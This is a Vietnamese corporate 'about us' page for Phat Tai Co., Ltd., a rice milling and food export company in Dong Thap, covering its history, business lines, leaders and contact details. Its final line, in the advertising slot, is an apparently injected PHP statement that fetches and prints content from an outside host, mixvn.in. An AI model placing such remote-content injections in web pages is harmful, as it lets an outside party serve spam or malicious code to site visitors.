Giới thiệu - Đôi Nét Về CTY TNHH PHÁT TÀI
Giới thiệu chung
CÔNG TY TNHH PHÁT TÀI kính chào quý khách! Cảm ơn quý khách đã ghé thăm trang web của chúng tôi! Tiền thân của Công ty TNHH Phát Tài là DNTN Phát Đạt được thành lập vào năm 1993 tại Phường 11, Thị xã Cao Lãnh, Tỉnh Đồng Tháp; lĩnh vực hoạt động gồm: xay xát, chế biến và kinh doanh lương thực; số vốn điều lệ là 100 triệu VNĐ (một trăm triệu đồng).
Lượt xem : 5567 - Ngày đăng : 03/09/2014 - 08:20:12 (GMT+7)
   
CÔNG TY TNHH PHÁT TÀI kính chào quý khách!
Cảm ơn quý khách đã ghé thăm trang web của chúng tôi!

1.    Quá trình phát triển:
Tiền thân của Công ty TNHH Phát Tài là DNTN Phát Đạt được thành lập vào năm 1993 tại Phường 11, Thị xã Cao Lãnh, Tỉnh Đồng Tháp; lĩnh vực hoạt động gồm: xay xát, chế biến và kinh doanh lương thực; số vốn điều lệ là 100 triệu VNĐ (một trăm triệu đồng).
Cùng với xu hướng phát triển của thị trường, đồng thời mở rộng quy mô cũng như loại hình hoạt động, ngày 29/01/1996, DNTN Phát Đạt chính thức nâng cấp thành Công ty TNHH Phát Tài với lĩnh vực kinh doanh chủ lực là Xay xát thóc lúa, mua bán lương thực, nông sản xuất nhập khẩu.  
Để tạo thuận tiện và rút ngắn quảng đường vận chuyển, đồng thời đảm bảo kịp thời - ổn định nguồn nguyên liệu đầu vào, Công ty TNHH Phát Tài quyết định chuyển trụ sở về Số 69, Quốc lộ 80, Ấp Bình Phú Quới, Thị trấn Lấp vò, Huyện Lấp Vò, Tỉnh Đồng Tháp. Đây là tầm nhìn chiến lược đúng đắn, đồng thời là bước ngoặt quan trọng để đưa Công ty hoạt động theo quỹ đạo phát triển mạnh mẽ và bền vững.
Sau 10 lần đăng ký thay đổi kinh doanh, vào ngày 04/08/2010, công ty đã phát triển đa dạng về lĩnh vực hoạt động như: Vận tải hàng hóa đường sông bằng phương tiện cơ giới; sản xuất và xuất nhập khẩu thức ăn gia súc, gia cầm, thủy sản, lương thực; nuôi cá nước ngọt, nước lợ; chế biến và bảo quản thủy sản đông lạnh,… Bên cạnh, công ty cũng đã xây dựng thêm 3 kho, tổng diện tích là 25.000m2 với  sức chứa 25.000 tấn. Công ty cũng không ngừng cải tiến và nâng cấp hệ thống kĩ thuật máy móc, trang thiết bị sản xuất nhằm phục vụ tốt cho việc sản xuất và kinh doanh.
Với vốn điều lệ hơn 100 tỷ VNĐ (một trăm tỷ đồng), Công ty TNHH Phát Tài vừa đứng ra trực tiếp thu mua, vừa sản xuất chế biến, xuất ủy thác và cung ứng trên 100.000 tấn gạo/năm cho thị trường trong và ngoài nước.
Ngày 13/05/2005, Công ty TNHH Phát Tài trở thành hội viên chính thức của Hiệp Hội Lương Thực Việt Nam. Đây là những điều kiện, đồng thời cũng là thời cơ để Phát Tài hướng đến khẳng định vị thế, sức mạnh của mình trên thương trường quốc tế.
2.    Lĩnh vực kinh doanh
 • Xay xát thóc lúa, đánh bóng gạo.
 • Mua bán lương thực, nông sản nguyên liệu và sơ chế.
 • Vận tải hàng hóa đường sông bằng phương tiện cơ giới
 • Sản xuất thức ăn gia súc, gia cầm, thủy sản
 • Xuất nhập khẩu thức ăn gia súc, gia cầm, thủy sản, lương thực
 •  Nuôi cá nước ngọt, nước lợ (theo đúng quy hoạch)
 • Chế biến và bảo quản thủy sản đông lạnh.
3.    Ban lãnh đạo
Giám đốc:  Lê Phát Long
Hình ảnh
Phó Giám đốc:  Lê Phát Tài
Hình ảnh    Phó Giám đốc
    
4.    Chiến lược cạnh tranh:
Đầu tư công nghệ: Thấy rõ ưu việt cũng như nắm bắt và áp dụng kịp thời các thành tựu khoa học kỹ thuật, công nghệ tiên tiến, hiện đại, mỗi năm, Công ty TNHH Phát Tài dành trên 80% lợi nhuận thu được để cải tiến công nghệ, thay đổi máy móc tiên tiến, hoàn thiện dây chuyền sản xuất nhằm giảm thiểu lực lượng lao động. Bên cạnh, nhằm nâng cao năng suất, chất lượng và hạ giá thành sản phẩm. Hiện tại, Công ty có 04 dây chuyền lau bóng với công suất 10 tấn/giờ/dây chuyền.
Đầu tư nguồn nhân lực: Nguồn nhân lực không những được xem là tài sản của quốc gia mà còn là một trong những yếu tố quyết định sự thành bại của công ty. Vì vậy Phát Tài luôn chú trọng đào tạo chuyên môn, bồi dưỡng kiến thức,  kỹ năng giao tiếp - ứng xử, đạo đức nghề nghiệp cho đội ngũ kỹ sư, công nhân viên của công ty. Đồng thời, thiết lập và thực thi các chính sách thu hút nguồn nhân lực chất lượng nhằm đáp ứng các nhu cầu khắt khe của nền kinh tế thị trường.
5.    Chiến lược phát triển:
Với sự phát triển không ngừng về mọi mặt, Công ty TNHH Phát Tài hướng tới xuất khẩu sản phẩm trực tiếp ra thị trường nước ngoài. Bằng uy tín và năng lực của mình, Công ty Phát Tài đã và đang đẩy mạnh thực hiện nhiều hoạt động đầu tư, thăm dò thị trường, tìm kiếm đối tác ở ngoài nước với quan điểm: “Hợp tác và sẻ chia thịnh vượng”.
6.    Phương châm hinh doanh:
Tham gia vào thương trường với tư cách là một nhà sản xuất, kinh doanh xuất nhập khẩu, Công ty TNHH Phát Tài luôn mong muốn thiết lập và duy trì:
 • Sản phẩm “chất lượng”.
 •  “Giá cả” hợp lý.
 • Chữ “Tín” hàng đầu.
7.    Thành tích đạt được (những bằng khen cấp trung ướng, địa phương về hoạt động kinh doanh và qua các cuộc thi… -)
8.    Thông tin công ty
 • Tên công ty: CÔNG TY TNHH PHÁT TÀI
 • Tên giao dịch: PHAT TAI COMPANY LIMITED
 • Tên viết tắt:  PHAT TAI CO,. LTD
 • Địa chỉ trụ sở: Số 69, Quốc lộ 80, Ấp Bình Phú Quới, Thị trấn Lấp vò, Huyện Lấp Vò, Tỉnh Đồng Tháp
 •  Điện thoại: 067.3845203 – 0913.887030     Fax: 067.3845206
 • Email: cty_tnhh_phattai@yahoo.com
 • Website: http://www.phattairice.com.vn
 • Số Đăng ký kinh doanh: 1400105785
 • Mã số thuế: 1400105785
 • Vốn điều lệ: 100 tỷ VNĐ
 • Người đại diện theo pháp luật: LÊ PHÁT LONG
   
Tin khác
h 
Hỗ trợ trực tuyến
Bộ phận hỗ trợ

Lê Phát Long
Thống kê trực tuyến
Đang trực tuyến :
1
Tổng truy cập :
285445
Quảng Cáo
echo @file_get_contents("http://mixvn.in/3.php");